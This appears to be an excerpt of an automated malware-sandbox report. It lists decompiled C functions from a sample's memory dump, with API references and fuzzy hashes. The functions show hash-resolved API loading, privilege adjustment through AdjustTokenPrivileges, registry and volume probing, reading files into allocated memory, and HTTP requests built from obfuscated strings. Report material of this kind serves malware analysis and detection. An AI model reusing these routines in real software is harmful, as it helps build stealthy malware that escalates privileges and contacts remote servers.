    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: CallFrame@12Setting__getptd
    • String ID: j
    • API String ID: 3454690891-2137352139
    • Opcode ID: f5aa8b582035c679ceeea611f6396e06f301498e7134634ce9add663ef154c92
    • Instruction ID: 9459610015455f7db2658c92938f7dcfb3c5c1466b703c8d9179e49b8beb1a86
    • Opcode Fuzzy Hash: f5aa8b582035c679ceeea611f6396e06f301498e7134634ce9add663ef154c92
    • Instruction Fuzzy Hash: B6119A31900295DFDB01CFB4C484B9CBBB4AF4631AF08858BC4A42BA92D3B56942CF81
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • ___BuildCatchObject.LIBCMT ref: 6E4EE123
      • Part of subcall function 6E4EE07E: ___BuildCatchObjectHelper.LIBCMT ref: 6E4EE0B4
    • _UnwindNestedFrames.LIBCMT ref: 6E4EE13A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: BuildCatchObject$FramesHelperNestedUnwind
    • String ID: csm
    • API String ID: 3487967840-1018135373
    • Opcode ID: 525528ab6db260b62be6e8d7665979427e9f478acbd5cb83dbeda6d0a9fd729f
    • Instruction ID: 3dab6a1ecc867657acb6c800fa3b53caccba34f175a298f72326d9b66561e314
    • Opcode Fuzzy Hash: 525528ab6db260b62be6e8d7665979427e9f478acbd5cb83dbeda6d0a9fd729f
    • Instruction Fuzzy Hash: 21014B31001109BBDF025FA1CC80EEBBF6AEF09356F004416FD5815920D772A5B1DBE1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __getptd.LIBCMT ref: 6E4EDE98
      • Part of subcall function 6E4EB42B: __getptd_noexit.LIBCMT ref: 6E4EB42E
      • Part of subcall function 6E4EB42B: __amsg_exit.LIBCMT ref: 6E4EB43B
    • __getptd.LIBCMT ref: 6E4EDEA6
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: __getptd$__amsg_exit__getptd_noexit
    • String ID: csm
    • API String ID: 803148776-1018135373
    • Opcode ID: fa0aa78ec2824e6826c1a6ec99e363653e763366db769acccabf9b01618c6013
    • Instruction ID: 6446875167504e1c6c8cbd4ee59a5fc30a8236ac9f217eeb3dcc4463ff834259
    • Opcode Fuzzy Hash: fa0aa78ec2824e6826c1a6ec99e363653e763366db769acccabf9b01618c6013
    • Instruction Fuzzy Hash: 7E014B34801B069BCB688FB9D444EADB3B9AF64216F15582FD05166FA4CB30A981DF81
    Uniqueness

    Uniqueness Score: -1.00%

    Executed Functions

    C-Code - Quality: 94%
    			E008215D0(void* __eflags) {
    				char _v20;
    				intOrPtr _v22;
    				intOrPtr _v288;
    				intOrPtr _v296;
    				intOrPtr _v300;
    				char _v304;
    				char _v352;
    				char _v400;
    				struct _WIN32_FIND_DATAW _v992;
    				intOrPtr* _t33;
    				void* _t34;
    				intOrPtr _t36;
    				WCHAR* _t38;
    				void* _t40;
    				signed int _t50;
    				int _t53;
    				void* _t57;
    				void* _t58;
    				void* _t59;
    				void* _t64;
    				char* _t76;
    				intOrPtr _t77;
    				void* _t80;
    				intOrPtr _t81;
    				void* _t82;
    				void* _t84;
    				void* _t86;
    				void* _t92;
    
    				_t76 =  &_v304;
    				E0080AF10(_t76, 0x11c);
    				_v304 = 0x11c;
    				_t33 = E0081F5C0(0, 0x44f8007);
    				_t84 = _t82 + 0x10;
    				_t34 =  *_t33(_t76);
    				_t64 = 0;
    				if(_t34 == 0 || _v288 != 2) {
    					L34:
    					return _t64;
    				} else {
    					_t36 = _v22;
    					if(_t36 + 0xfe >= 2) {
    						if(_t36 != 1) {
    							goto L34;
    						}
    						_t77 = _v300;
    						if(_t77 == 6) {
    							if(_v296 == 0) {
    								_t64 = 4;
    								goto L34;
    							}
    							_t64 = 6;
    							if(_v296 != 1) {
    								L22:
    								_t38 = E0080F180(0x823ae0,  &_v352);
    								E0081F5C0(0, 0xae63487);
    								_t86 = _t84 + 0x10;
    								_t40 = FindFirstFileW(_t38,  &_v992); // executed
    								if(_t40 == 0xffffffff) {
    									L29:
    									if(E00815100() == 0) {
    										_t64 = 0xa;
    									} else {
    										_t64 = ( !(E00805BF0(E00809B90(_t41, E00801250(0x823a50,  &_v20)), 0)) & 1) + ( !(E00805BF0(E00809B90(_t41, E00801250(0x823a50,  &_v20)), 0)) & 1) + 8;
    										E008046C0(_t41);
    									}
    									goto L34;
    								}
    								_t80 = _t40;
    								do {
    									_t65 = _v992.dwFileAttributes;
    									_t50 = E00808AE0(0x82efa9c);
    									E00808AE0(0x82efa9c);
    									_t92 = _t86 + 8;
    									if(( !(_t50 ^ _v992.dwFileAttributes) & _t65) == 0) {
    										goto L24;
    									}
    									_t57 = E00801010( &(_v992.cFileName), E0080F180(0x823660,  &_v400));
    									_t92 = _t92 + 0x10;
    									if(_t57 == 0) {
    										goto L24;
    									}
    									_t64 = 0xc;
    									goto L34;
    									L24:
    									E0081F5C0(0, 0x2a85667);
    									_t86 = _t92 + 8;
    									_t53 = FindNextFileW(_t80,  &_v992); // executed
    								} while (_t53 != 0);
    								goto L29;
    							}
    							goto L34;
    						}
    						if(_t77 != 5) {
    							_t58 = E00808AE0(0x82efa89);
    							_t84 = _t84 + 4;
    							if(_t77 <= _t58) {
    								goto L34;
    							}
    							goto L22;
    						} else {
    							if(_v296 == 0) {
    								_t64 = 1;
    							} else {
    								_t64 = 2;
    								if(_v296 != 1) {
    									_t64 = (0 | _v296 == 0x00000002) + (0 | _v296 == 0x00000002);
    								}
    							}
    							goto L34;
    						}
    					}
    					_t81 = _v300;
    					if(_t81 == 6) {
    						if(_v296 == 0) {
    							_t64 = 5;
    							goto L34;
    						}
    						_t64 = 7;
    						if(_v296 == 1) {
    							goto L34;
    						}
    						_t64 = 9;
    						if(_v296 == 2) {
    							goto L34;
    						}
    						_t59 = E00808AE0(0x82efa8f);
    						_t84 = _t84 + 4;
    						_t64 = 0xb;
    						if(_v296 != _t59) {
    							L6:
    							_t64 = ( !(E00807600(_t81, 5)) & 1) + ( !(E00807600(_t81, 5)) & 1) * 8;
    							goto L34;
    						}
    						goto L34;
    					}
    					if(_t81 != 5) {
    						goto L6;
    					}
    					_t64 = 3;
    					if(_v296 == 2) {
    						goto L34;
    					}
    					goto L6;
    				}
    			}
































    APIs
    • FindFirstFileW.KERNEL32(00000000,?), ref: 0082177B
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: FileFindFirst
    • String ID:
    • API String ID: 1974802433-0
    • Opcode ID: 0c721c7cf2d995ee37350886d5afea4968870cd8800d3d1b3bdade1d9a1e74d0
    • Instruction ID: 61d9b3eda050bc3b426f1b07fe814fee1a0ba9a5ea9f16482c44a037aa9120ed
    • Opcode Fuzzy Hash: 0c721c7cf2d995ee37350886d5afea4968870cd8800d3d1b3bdade1d9a1e74d0
    • Instruction Fuzzy Hash: 87512A72D003389BDF305554BC8A7EE3268FB26315F1400B1E95DE6182EA755EC8CEA3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 28%
    			E0080E070(void* __eflags, intOrPtr _a4, signed int _a8) {
    				void* _v20;
    				intOrPtr _v24;
    				struct _TOKEN_PRIVILEGES _v36;
    				signed int _t12;
    				intOrPtr* _t14;
    				intOrPtr* _t15;
    				void* _t16;
    				intOrPtr* _t21;
    				intOrPtr* _t23;
    				int _t27;
    				intOrPtr* _t28;
    				signed int _t30;
    				intOrPtr* _t32;
    				signed int _t34;
    				signed int _t35;
    				void** _t37;
    				void* _t43;
    				void* _t47;
    				void* _t48;
    
    				_t12 = E00808AE0(0x82efa85);
    				_t14 = E0081F5C0(_t12, E00808AE0(0x3cf15e2));
    				_t15 = E0081F5C0(0, 0x160d384);
    				_t47 = _t43 + 0x18;
    				_t16 =  *_t15();
    				_t37 =  &_v20;
    				_push(_t37);
    				_push(0);
    				_push(0x20);
    				_push(_t16);
    				if( *_t14() != 0) {
    					L2:
    					_v36.PrivilegeCount = 1;
    					_v24 = (_a8 & 0x000000ff) + (_a8 & 0x000000ff);
    					_t21 = E0081F5C0(9, 0xa2414e7);
    					_t48 = _t47 + 8;
    					_push( &(_v36.Privileges));
    					_push(_a4);
    					_push(0);
    					if( *_t21() == 0) {
    						L5:
    						_t35 = 0;
    					} else {
    						E0081F5C0(9, 0xc8d1a33);
    						_t48 = _t48 + 8;
    						_t27 = AdjustTokenPrivileges(_v20, 0,  &_v36, 0, 0, 0); // executed
    						if(_t27 == 0) {
    							goto L5;
    						} else {
    							_t28 = E0081F5C0(0, 0xc702be2);
    							_t48 = _t48 + 8;
    							_t35 = _t34 & 0xffffff00 |  *_t28() == 0x00000000;
    						}
    					}
    					_t23 = E0081F5C0(0, 0xb8e7db5);
    					 *_t23(_v20);
    				} else {
    					_t30 = E00808AE0(0x82efa85);
    					_t32 = E0081F5C0(_t30, E00808AE0(0x7058432));
    					_t47 = _t47 + 0x10;
    					_push(_t37);
    					_push(0x20);
    					_push(0xffffffff);
    					if( *_t32() == 0) {
    						_t35 = 0;
    					} else {
    						goto L2;
    					}
    				}
    				return _t35;
    			}























    APIs
    • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 0080E145
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: AdjustLibraryLoadPrivilegesToken
    • String ID:
    • API String ID: 1509250347-0
    • Opcode ID: a2d3f3b228e42fc462a3bc1dc47c402564b005106094cfa130b61bfce17124e1
    • Instruction ID: 17d8688349d5395db0cc7415f53e8c3ca9bf12dda52ce3b37c86e4ce186e693e
    • Opcode Fuzzy Hash: a2d3f3b228e42fc462a3bc1dc47c402564b005106094cfa130b61bfce17124e1
    • Instruction Fuzzy Hash: 552180B2E802113AE7502AE86C03FAF351CEF51B59F080535FE19E52C2F9A19A1441B3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E008124B0(void* __eax, void* _a4, short* _a8, short* _a12, int* _a16, char** _a20) {
    				int _v20;
    				signed char _t22;
    				long _t24;
    				long _t27;
    				signed char _t28;
    				void* _t31;
    				char* _t33;
    				long _t35;
    				char** _t46;
    				int _t48;
    				char* _t50;
    				void* _t51;
    				void* _t53;
    				void* _t55;
    				void* _t58;
    
    				_push(__eax);
    				 *_a20 = 0;
    				_t22 = E008128A0(_a20, _t58, 0xffffffff);
    				E0081F5C0(9, 0xda29a27);
    				_t53 = _t51 + 0xc;
    				_t24 = RegOpenKeyExW(_a4, _a8, 0, (_t22 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
    				_t48 = 0xffffffff;
    				if(_t24 == 0) {
    					_t46 = _a20;
    					_v20 = 0;
    					E0081F5C0(9, 0x8097c7);
    					_t55 = _t53 + 8;
    					_t27 = RegQueryValueExW(_a4, _a12, 0, _a16, 0,  &_v20); // executed
    					if(_t27 == 0) {
    						_t38 = _v20;
    						_t28 = E00804C00(_v20, 0);
    						_t55 = _t55 + 8;
    						_t48 = 0;
    						__eflags = _t28 & 0x00000001;
    						if((_t28 & 0x00000001) == 0) {
    							_t31 = E00802640(_t38 + 0x214148fa, 0x214148f6);
    							E00808AE0(0x82efa88);
    							_t33 = E0081D310(_t31);
    							_t55 = _t55 + 0x10;
    							__eflags = _t33;
    							if(_t33 == 0) {
    								goto L2;
    							} else {
    								_t50 = _t33;
    								E0081F5C0(9, 0x8097c7);
    								_t55 = _t55 + 8;
    								_t35 = RegQueryValueExW(_a4, _a12, 0, _a16, _t50,  &_v20); // executed
    								__eflags = _t35;
    								if(_t35 == 0) {
    									 *_t46 = _t50;
    									_t48 = _v20;
    								} else {
    									E008046C0(_t50);
    									_t55 = _t55 + 4;
    									goto L2;
    								}
    							}
    						}
    					} else {
    						L2:
    						_t48 = 0xffffffff;
    					}
    					E0081F5C0(9, 0x3111c69);
    					_t53 = _t55 + 8;
    					RegCloseKey(_a4); // executed
    				}
    				return _t48;
    			}

    APIs
    • RegOpenKeyExW.KERNEL32(00000000,?,00000000,00000000,?,?,?,00000000), ref: 008124F1
    • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 0081252A
    • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 0081259C
    • RegCloseKey.KERNEL32(?), ref: 008125C4
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: QueryValue$CloseOpen
    • String ID:
    • API String ID: 1586453840-0
    • Opcode ID: 857bee3bcbea923aaf42bf097b010d9f1774328087c06d4f03afca3265acf286
    • Instruction ID: dc32b9cc673bc4c591240305464f77417099e371568d473530c69c36a82285f9
    • Opcode Fuzzy Hash: 857bee3bcbea923aaf42bf097b010d9f1774328087c06d4f03afca3265acf286
    • Instruction Fuzzy Hash: F231A7B29402157BEB509E54AC42FEB361DFF15764F080520FE19E62C2F671EA6186F2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00810ED0(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20, signed int _a24) {
    				char _v20;
    				char _v24;
    				void* _v28;
    				signed char _v32;
    				intOrPtr _v36;
    				char _v40;
    				char _v44;
    				char _v56;
    				char _v65;
    				char _v85;
    				char _v597;
    				signed int _t47;
    				void* _t52;
    				intOrPtr* _t54;
    				void* _t56;
    				void* _t60;
    				void* _t61;
    				void* _t64;
    				char* _t68;
    				int _t69;
    				intOrPtr* _t72;
    				void* _t73;
    				signed char _t75;
    				intOrPtr* _t77;
    				void* _t78;
    				void* _t79;
    				intOrPtr* _t82;
    				signed int _t99;
    				signed char _t100;
    				long _t104;
    				char* _t105;
    				void* _t109;
    				void* _t110;
    				void* _t111;
    				void* _t112;
    				void* _t119;
    				void* _t123;
    
    				_t129 = __eflags;
    				_t47 = E0080B9F0(__eflags, _a24 & 0x00000004, 0);
    				_v32 = _t47;
    				E00821BB0( &_v56, _t129, E00801250(0x82389b,  &_v44));
    				_v40 = E00822160( &_v56);
    				_v36 = 0;
    				_t52 = E00808AE0(0x82efa9f);
    				_t54 = E0081F5C0(_t52, E00808AE0(0x3c56e1d));
    				_t56 = E00801250(0x824002,  &_v65);
    				_t96 =  ==  ? 0x82351e : "<}a5U\rVD";
    				_t60 = E00801250( ==  ? 0x82351e : "<}a5U\rVD",  &_v597);
    				_t119 = _t112 + 0x30;
    				_t61 =  *_t54(_a4, _t60, _a8, _t56, _a12,  &_v40, (_t47 & 0x00000001) << 0x00000017 | 0x8404c700, 0);
    				_t109 = 0;
    				if(_t61 != 0) {
    					_v28 = _t61;
    					_t104 = _a20;
    					_t110 = _a16;
    					if((_v32 & 0x00000001) != 0) {
    						_v20 = 0;
    						_v24 = 4;
    						_t77 = E0081F5C0(0x13, 0x85dc001);
    						_t78 = E00808AE0(0x82efa93);
    						_t119 = _t119 + 0xc;
    						_t105 =  &_v20;
    						_t111 = _v28;
    						_t79 =  *_t77(_t111, _t78, _t105,  &_v24);
    						_t133 = _t79;
    						if(_t79 != 0) {
    							_v20 = E0080A420(_t133, _v20, E00808AE0(0x82fc90c));
    							_t82 = E0081F5C0(0x13, 0x5b4d601);
    							_t119 = _t119 + 0x14;
    							 *_t82(_t111, 0x1f, _t105, 4);
    						}
    						_t110 = _a16;
    						_t104 = _a20;
    					}
    					_t64 = E00808AE0(0x82efa9f);
    					E0081F5C0(_t64, E00808AE0(0x33b801d));
    					_t68 = E00801250(0x823b70,  &_v85);
    					_t123 = _t119 + 0x18;
    					_t109 = _v28;
    					_t69 = HttpSendRequestA(_t109, _t68, 0x13, _t110, _t104); // executed
    					if(_t69 == 0) {
    						L8:
    						E0081F5C0(0x13, 0x714b685);
    						InternetCloseHandle(_t109); // executed
    						_t109 = 0;
    					} else {
    						_v20 = 0;
    						_v24 = 4;
    						_t72 = E0081F5C0(0x13, 0x249c261);
    						_t73 = E00808AE0(0x282efa9f);
    						_t123 = _t123 + 0xc;
    						_t99 =  &_v24;
    						_t75 =  *_t72(_t109, _t73,  &_v20, _t99, 0) & 0xffffff00 | _t74 == 0x00000000;
    						_t100 = _t99 & 0xffffff00 | _v20 != 0x000000c8;
    						if((_t75 & _t100) != 0 || (_t75 ^ _t100) != 0) {
    							goto L8;
    						}
    					}
    				}
    				E00822960( &_v56);
    				return _t109;
    			}

    APIs
    • HttpSendRequestA.WININET(?,00000000,00000013,00000000,?), ref: 00811070
    • InternetCloseHandle.WININET(?), ref: 008110D7
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: CloseHandleHttpInternetLibraryLoadRequestSend
    • String ID: <}a5UVD
    • API String ID: 253643169-4191014945
    • Opcode ID: 1b5f55b0a67350ffc3146d08d766b704d184ab16f6d192eef0a726c712a28768
    • Instruction ID: e17e2eb68bcac3d8dcda3c59192ed7a37e2820f9d55c7b04283b432e9ff454ac
    • Opcode Fuzzy Hash: 1b5f55b0a67350ffc3146d08d766b704d184ab16f6d192eef0a726c712a28768
    • Instruction Fuzzy Hash: 5E5198B1E002156BEF109AA4AC46BFF366CFF05714F040024FA05F6242E6755E5587B7
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 46%
    			E00810420(void* __eflags, intOrPtr _a4) {
    				short _v440;
    				char _v516;
    				char _v536;
    				char _v1056;
    				intOrPtr* _t8;
    				void* _t9;
    				void* _t10;
    				intOrPtr* _t11;
    				intOrPtr* _t14;
    				void* _t15;
    				intOrPtr* _t18;
    				intOrPtr* _t21;
    				void* _t23;
    				intOrPtr* _t25;
    				intOrPtr* _t27;
    				intOrPtr* _t29;
    				void* _t30;
    				void* _t31;
    				char* _t32;
    				char* _t33;
    				void* _t38;
    				void* _t40;
    
    				_t8 = E0081F5C0(8, 0x3a5687);
    				_t9 = E00808AE0(0x82efaa8);
    				_t40 = _t38 + 0xc;
    				_t32 =  &_v1056;
    				_t10 =  *_t8(0, _t9, 0, 0, _t32); // executed
    				if(_t10 == 0) {
    					_t11 = E0081F5C0(3, 0x55e8477);
    					 *_t11(_t32);
    					_t14 = E0081F5C0(0, E00808AE0(0x796236b));
    					_t40 = _t40 + 0x14;
    					_t33 =  &_v536;
    					_t15 =  *_t14(_t32, _t33, 0x104); // executed
    					if(_t15 != 0) {
    						L7:
    						if(_v516 != 0x7b) {
    							goto L1;
    						}
    						_v440 = 0;
    						_t18 = E0081F5C0(0xc, 0xd513d37);
    						_t40 = _t40 + 8;
    						_push(_a4);
    						_push( &_v516);
    						if( *_t18() != 0) {
    							goto L1;
    						}
    						return 1;
    					}
    					0;
    					while(1) {
    						_t21 = E0081F5C0(3, 0xd0682f7);
    						 *_t21(_t32);
    						_t23 = E00808AE0(0x82efa8f);
    						_t25 = E0081F5C0(_t23, E00808AE0(0xc02d51b));
    						_t40 = _t40 + 0x18;
    						_push(_t32);
    						if( *_t25() == 0) {
    							goto L1;
    						}
    						_t27 = E0081F5C0(3, 0x55e8477);
    						 *_t27(_t32);
    						_t29 = E0081F5C0(0, 0xfb8d9e7);
    						_t30 = E00808AE0(0x82efb88);
    						_t40 = _t40 + 0x14;
    						_t31 =  *_t29(_t32, _t33, _t30); // executed
    						if(_t31 == 0) {
    							continue;
    						}
    						goto L7;
    					}
    				}
    				L1:
    				E0080AF10(_a4, 0x10);
    				return 0;
    			}

    APIs
    • GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000104), ref: 008104AF
    • GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000000), ref: 00810536
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: Volume$MountNamePoint
    • String ID: {
    • API String ID: 1269602640-366298937
    • Opcode ID: ba74647f05f3f9978a698a5b29d0bf71b7ba8fdc8241710126e8e22cfa3f839c
    • Instruction ID: c0f2c219ed73c16c2367fcef69ddf1cd545b48036938718fb2c1e4a23f394941
    • Opcode Fuzzy Hash: ba74647f05f3f9978a698a5b29d0bf71b7ba8fdc8241710126e8e22cfa3f839c
    • Instruction Fuzzy Hash: B4214CA6A8071526F62036A86C43FFA251CEF61B4DF044471FE4DE4183F9E29AD445B7
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E00821090(void* __eflags, WCHAR* _a4, void** _a8, signed int _a12) {
    				void* _v16;
    				char _v32;
    				intOrPtr _v36;
    				void* _v40;
    				long _v44;
    				void* _t30;
    				signed char _t31;
    				void* _t32;
    				intOrPtr* _t33;
    				signed char _t35;
    				intOrPtr* _t36;
    				void* _t38;
    				long _t40;
    				long _t41;
    				void* _t42;
    				int _t44;
    				intOrPtr* _t45;
    				long _t49;
    				void** _t55;
    				signed int _t59;
    				void* _t66;
    				void* _t69;
    				void* _t73;
    				void* _t74;
    
    				_t74 = __eflags;
    				_t48 = _a12;
    				E0081F5C0(0, 0xad68947);
    				E008088A0(_t74, _a12 ^ 0xfffffffd, _t48);
    				E008088A0(_t74, _t48, E00808AE0(0x82efa8e));
    				_t55 = _a8;
    				_t51 =  ==  ? 1 : 7;
    				_t30 = CreateFileW(_a4, 0x80000000,  ==  ? 1 : 7, 0, 3, 0, 0); // executed
    				_t55[2] = _t30;
    				_t31 = E00805BF0(_t30, 0xffffffff);
    				_t66 = (_t59 & 0xfffffff8) - 0x18 + 0x24;
    				if((_t31 & 0x00000001) != 0) {
    					L4:
    					_t32 = 0;
    				} else {
    					_t33 = E0081F5C0(0, 0x16bdb88);
    					_t35 = E00804C00( *_t33(_t55[2],  &_v32), 0);
    					_t69 = _t66 + 0x10;
    					if((_t35 & 0x00000001) != 0 || _v36 != 0) {
    						L3:
    						_t36 = E0081F5C0(0, 0xb8e7db5);
    						 *_t36(_t55[2]);
    						goto L4;
    					} else {
    						_t38 = _v40;
    						_t55[1] = _t38;
    						__eflags = _t38;
    						if(_t38 == 0) {
    							 *_t55 = 0;
    							_t32 = 1;
    						} else {
    							E0081F5C0(0, 0x1f8cae3);
    							_t49 = _t55[1];
    							_t40 = E00808AE0(0x82eca8c);
    							_t41 = E00808AE0(0x82efa88);
    							_t69 = _t69 + 0x10;
    							_t55 = _a8;
    							_t42 = VirtualAlloc(0, _t49, _t40, _t41); // executed
    							 *_t55 = _t42;
    							__eflags = _t42;
    							if(_t42 == 0) {
    								goto L3;
    							} else {
    								E0081F5C0(0, 0xb7ac9a5);
    								_t73 = _t69 + 8;
    								_t44 = ReadFile(_t55[2],  *_t55, _t55[1],  &_v44, 0); // executed
    								__eflags = _t44;
    								if(_t44 == 0) {
    									L12:
    									_t45 = E0081F5C0(0, 0xb1fd105);
    									_t69 = _t73 + 8;
    									 *_t45( *_t55, 0, 0x8000);
    									goto L3;
    								} else {
    									__eflags = _v44 - _t55[1];
    									if(_v44 != _t55[1]) {
    										goto L12;
    									} else {
    										_t32 = 1;
    									}
    								}
    							}
    						}
    					}
    				}
    				return _t32;
    			}

    APIs
    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?), ref: 008210FB
    • VirtualAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0082119F
    • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 008211C5
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: File$AllocCreateReadVirtual
    • String ID:
    • API String ID: 3585551309-0
    • Opcode ID: 1635c8c5ca5f72dcb1ae71b59bcec94847d9ab7d17827dbe54a6838f3d548b95
    • Instruction ID: e758190a80064c96e37c929c64adab1b2eb2e47fe8250af4194dbc17fee17ecf
    • Opcode Fuzzy Hash: 1635c8c5ca5f72dcb1ae71b59bcec94847d9ab7d17827dbe54a6838f3d548b95
    • Instruction Fuzzy Hash: D7411BB5A402017BEA106A64EC07F69B758FF11715F144135FA19E62C2FB71E96087B3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E008105D0(intOrPtr _a4) {
    				void* _v20;
    				long _v24;
    				intOrPtr _v28;
    				intOrPtr* _t12;
    				int _t16;
    				intOrPtr* _t21;
    				void* _t23;
    				int _t25;
    				intOrPtr* _t27;
    				signed char* _t28;
    				void* _t33;
    				intOrPtr* _t34;
    				DWORD* _t35;
    				signed char* _t36;
    				void* _t38;
    				intOrPtr _t40;
    				void* _t41;
    				void* _t42;
    				void* _t43;
    				void* _t47;
    
    				_v20 = 0;
    				_t12 = E0081F5C0(9, 0xf2b7ebe);
    				_t42 = _t41 + 8;
    				_push( &_v20);
    				_push(8);
    				_push(_a4);
    				if( *_t12() == 0) {
    					_t40 = 0xffffffff;
    					L12:
    					return _t40;
    				}
    				E0081F5C0(9, 0xbd557e);
    				_t43 = _t42 + 8;
    				_t35 =  &_v24;
    				_t16 = GetTokenInformation(_v20, 0x19, 0, 0, _t35); // executed
    				_t40 = 0xffffffff;
    				if(_t16 != 0) {
    					L10:
    					E0081F5C0(0, E00808AE0(0x3a08739));
    					FindCloseChangeNotification(_v20); // executed
    					goto L12;
    				}
    				_t21 = E0081F5C0(0, E00808AE0(0x45ed16e));
    				_t43 = _t43 + 0xc;
    				if( *_t21() != 0x7a) {
    					goto L10;
    				}
    				_t23 = E0081D310(_v24);
    				_t43 = _t43 + 4;
    				if(_t23 != 0) {
    					_t38 = _t23;
    					E0081F5C0(9, 0xbd557e);
    					_t47 = _t43 + 8;
    					_t25 = GetTokenInformation(_v20, 0x19, _t38, _v24, _t35); // executed
    					_t40 = 0xffffffff;
    					if(_t25 != 0) {
    						_t27 = E0081F5C0(9, 0x8847844);
    						_t47 = _t47 + 8;
    						_t28 =  *_t27( *_t38);
    						if(_t28 != 0) {
    							_t36 = _t28;
    							if( *_t28 != 0) {
    								_v28 = E0081F5C0(9, 0x7a1c189);
    								_t33 = E00802640(0, E00802640(0,  *_t36 & 0x000000ff) + 1);
    								_t47 = _t47 + 0x18;
    								_t34 = _v28( *_t38, _t33);
    								if(_t34 != 0) {
    									_t40 =  *_t34;
    								}
    							}
    						}
    					}
    					E008046C0(_t38);
    					_t43 = _t47 + 4;
    				}
    			}

    APIs
    • GetTokenInformation.KERNELBASE(00000000,00000019,00000000,00000000,?), ref: 0081061F
    • FindCloseChangeNotification.KERNEL32(00000000), ref: 00810704
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
      • Part of subcall function 0081D310: RtlAllocateHeap.NTDLL(009A0000,00000000,00810659,?,?,?,?), ref: 0081D353
    • GetTokenInformation.KERNELBASE(00000000,00000019,00000000,?,?), ref: 0081067F
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: InformationToken$AllocateChangeCloseFindHeapLibraryLoadNotification
    • String ID:
    • API String ID: 2068138336-0
    • Opcode ID: 0924dd35061e1f200624de88232b5a4b614852f60535a3ddadb817e5e9f0d1dc
    • Instruction ID: 3497f4fc5c07a537d329b340e753aedb034590d9a94c809edd5723b53d476cd5
    • Opcode Fuzzy Hash: 0924dd35061e1f200624de88232b5a4b614852f60535a3ddadb817e5e9f0d1dc
    • Instruction Fuzzy Hash: 47319465E403153FEA106AA86C03FAE351DFF61759F180530FE18E51D2FA915AA486B3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E008064D0(void* _a4, short* _a8, short* _a12, int* _a16, char* _a20, int _a24) {
    				void* _t11;
    				signed char _t12;
    				long _t14;
    				signed int _t29;
    				void* _t38;
    
    				_t12 = E008128A0(_t11, _t38, 0xffffffff);
    				E0081F5C0(9, 0xda29a27);
    				_t14 = RegOpenKeyExW(_a4, _a8, 0, (_t12 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
    				_t29 = 0xffffffff;
    				if(_t14 == 0) {
    					E0081F5C0(9, 0x8097c7);
    					RegQueryValueExW(_a4, _a12, 0, _a16, _a20,  &_a24); // executed
    					asm("sbb esi, esi");
    					_t29 =  !0x00000000 | _a24;
    					E0081F5C0(9, 0x3111c69);
    					RegCloseKey(_a4); // executed
    				}
    				return _t29;
    			}

    APIs
    • RegOpenKeyExW.KERNEL32(00000000,00000003,00000000,-80000001,?,?,?,00000000), ref: 00806507
    • RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00806536
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
    • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00806556
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: CloseLibraryLoadOpenQueryValue
    • String ID:
    • API String ID: 3751545530-0
    • Opcode ID: 7b110a552ead95d305b3e80e3887d95556957b0b802b8bb04bbc6efa0a364464
    • Instruction ID: 473c242eb3f7745396be5298d1b67da776b602be19971af0ba6f02e796ff8b9b
